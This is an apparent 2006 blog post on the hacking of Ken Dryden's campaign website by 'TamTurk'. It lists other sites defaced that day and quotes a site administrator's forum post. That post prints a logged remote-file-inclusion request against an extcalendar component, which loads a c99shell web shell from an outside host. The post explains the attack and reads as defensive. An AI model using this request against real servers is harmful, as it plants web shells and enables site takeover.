It's been a tough day for the administrators of Ken Dryden's website:
An Internet hacker took over leadership hopeful Ken Dryden's website Tuesday.
The erstwhile hockey great's smiling visage and campaign pitch disappeared, replaced by a triumphal message: "Hacked by TamTurk. We are Turk."
That was followed by gibberish.
Lise Jolicoeur, spokeswoman for Dryden's campaign, said the hacker took over the site during the wee hours of the morning Tuesday.
Jolicoeur said no one has any idea who TamTurk is, but she's inclined to think it's just a prank - not deliberate sabotage by a rival leadership campaign.
That no one knows is strange, because TamTurk has been a busy boy.
First, check out what Ken Dryden's website looked like after the attack, but before it was taken down.
The text in the picture is some sort of Turkish proverb or saying about a "genuine push" and "helping", but I'm having trouble translating a couple of words.
The rest of the text are either TamTurk's signatures or words that mean something to the hacker community.
Why Dryden? Just dumb luck. Here is the list of attacks known to have been perpetrated by TamTurk today:
DIGITAL ATTACKS ARCHIVE
- 09/26/2006: http://fuelspace.com
- 09/26/2006: http://www.ottawachallenge.ca
- 09/26/2006: http://www.kendryden.ca
- 09/26/2006: http://www.lantmeeters.com
- 09/26/2006: http://www.branchitude.com
- 09/26/2006: http://www.kapelle-op-den-bos.net
- 09/26/2006: http://www.drivesafe.com
- 09/26/2006: http://spinetime16.com
- 09/26/2006: http://cage8.com
- 09/26/2006: http://michaelfordphotography.com
- 09/26/2006: http://mebuildingdreams.com
- 09/26/2006: http://gwac.ca
- 09/26/2006: http://fairsolutions.com
- 09/26/2006: http://hemantrao.com
- 09/26/2006: http://rebecca.no
- 09/26/2006: http://newcitycompound.com
- 09/26/2006: http://beachviewretreat.com
- 09/26/2006: http://byondbeads.com
- 09/26/2006: http://bluebettausa.com
- 09/26/2006: http://betterbettas.com
Hey guys, should this be a warning?? -->HacKeD By TamTurk<--
we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....
We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:
.../components/com_extcalendar/admin_events.php
The whole command looked like this:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=htt p%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F &act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"Also, this php file did not have any defined( '_VALID_MOS' ) line...
We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...
Any opinions:mad: :mad: :mad: :confused: :confused: :confused: ns
So this is not an attack by another leadership campaign, but an exploitation of PHP backdoors by a hacker who gets around.
